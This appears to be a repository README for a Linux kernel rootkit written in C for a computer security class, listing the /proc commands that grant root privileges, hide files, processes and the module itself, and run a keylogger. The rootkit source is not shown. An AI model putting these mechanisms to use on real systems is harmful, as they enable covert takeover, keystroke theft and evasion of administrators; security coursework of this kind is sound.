
simple rootkit for computer security class

Primary LanguageC

change the definitions desired command files in rootkit.c 
the examples make use of the default values

	- privilege escalation:
		write to /proc/harmless_file/gimme_root
		to get root euid etc for the process
		example: echo 1 > /proc/harmless_file/gimme_root
	-hiding/showing files
		write hide/show to /proc/harmless_file/hide_file
		example: echo hide /etc/passwd > /proc/harmless_file/hide_file
	-hiding pid: -similar to hiding file just write to hide_pid instead

	-hiding module from lsmod:
		to hide echo 1 > /proc/harmless_file/hide_module
		write 0 to show
	-enabling disabling keylogger:
		write 0/1 to /proc/harmless_file/keylogger
	-reading keylogger log:
		cat /proc/harmless_file/keylogger
		you'll need a custom app to decipher the keysym